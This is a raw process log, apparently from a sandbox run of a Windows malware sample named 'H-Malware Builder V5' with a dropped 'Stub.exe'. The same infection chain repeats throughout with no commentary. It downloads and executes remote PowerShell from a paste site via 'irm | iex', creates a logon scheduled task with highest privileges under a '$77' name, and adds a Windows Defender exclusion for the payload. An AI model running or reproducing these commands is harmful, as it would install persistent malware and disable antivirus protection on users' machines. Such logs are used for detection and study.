"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-759720614-114551988-10829642891142499248-1346065353-1708930420-1692500942159465668"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "6709464081603188433999079362-490326400938330376404741403446901449-173702388"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1548174283-16579753426474451619396139242094196912-139300579268471104-1024849926"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "787099995-1895992732-17501242335023151011073593136-2141236445-64923451859521277"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f6492548-2ff8-4852-9a5c-41886f5985b6}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1175545578-1778622751258649665783288742237941442-1743488075974933342-796245022"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "6364561111443597361-1934135915394529519-14331789341941311772-12358763861197314135"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "337865877562856591478059300-9794222762547872341895301810-12145878271784283826"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{276047b5-b030-40c3-9e9b-380a43f94dc6}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1373922897-20552865959596000831363370225-827834822-12746480341546815333-2058198541"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1216478723-620470056-168809781042063912-367374261439362568-1925104962-898513992"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{393e59db-c344-45bd-8571-7dd851c16c20}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "531544789-1376330739356163519379377128-1031942380705341644289677108-766176334"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2012191197-489668545-335798726-1114887049-14468033681181819267850625655-1137832778"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{23d4804c-ac96-4f14-a84a-87f33f3c4ac7}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-118817501-15138212051449840465-1153820160-4757577721766783720807200337-1657643502"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15736218971705661223-15402644101156709177-7622167802059213303-1954685457-1826484396"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-600186781-696915314161643401-1465218360-293719074-1100429955651495922-203760398"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3dc2001e-57ee-4f5c-b2dd-fc568e216790}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2073837781576365561844206198-406157297-1382866802-2107875568746920632038625896"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1290659079252616349-2961061281814374316-1534923737-2023460904-1350926588-722363010"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a47334ca-0d0b-4891-9656-0dd4bfcea99a}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ce21aee7-1d89-4eef-84bd-badfba17dbab}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "28493053420195454316591388614737804961163365018-1556520737-1519912346152796347"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11158921061942171606-1876429976-340579860-140811390-501893000695079267-57575038"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c5421821-29dd-4439-aec6-f5ab701c15bd}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1592300802-1125090077412264604208253486515199969162075706307-1107652390-872347230"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1390621235-2140427527-3888400771306064596-683654599-1906422318-787327270-1105790730"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a8d63dd2-421c-413a-a6a9-bfc4c269e575}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-150182375320764138061181264458681198385-1357469059-290976817-1259594266296500123"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{8fad834c-35b8-441f-adcd-68a9d28dbe78}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "14217279-1523039658974102170-95682348-7596315617903086121696891047353540906"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "72463624747755532210150431792022494681278858142-12604900403696778-1921125488"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6ef01380-3628-4f71-b57e-0f40de2f174a}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-884051115985304638142863174-348513958-1694184333-10437108351841475425552380518"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-923882584-693518846-670877583850667607-199998555117473477853329393285397128"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f6f6bd04-a03b-4609-be57-a540e0b0e047}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1653429358158510995813923117101980780107752276129-15267719849259381711085534357"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1827e9f7-4bca-4ea5-b73b-d8c27d996bad}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-81321301-1381990823-2049100907819688463-8333658431126606083-817960600-648957999"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{30738389-e346-4a79-8682-b23677885125}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "59533561-255787318-209910757235908180-449314930-3957853946078229151681819539"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16617032261805336481-393615654-787539816-1490141643-194263445758277602774314460"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{8e388215-6a7a-4479-b844-9f7105d64966}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1611605839-966798651970194383-4921579631526728872-841368038-1440469844-1575009569"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19592581110329084441172179465-17210295024579207638564644451617213353-908248454"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{29f48b0f-940f-4f4a-a209-7b10543d63a5}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "521421593686314847-820088597-477860741417351813-1115424480-1582482051-1942205669"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "255603567675468979448715504-2093467767-1579274390-17850074631868351201-1887449639"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
